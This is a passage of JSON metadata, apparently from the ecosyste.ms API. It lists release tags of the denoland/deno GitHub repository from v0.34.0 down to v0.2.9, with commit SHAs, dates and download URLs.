osts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"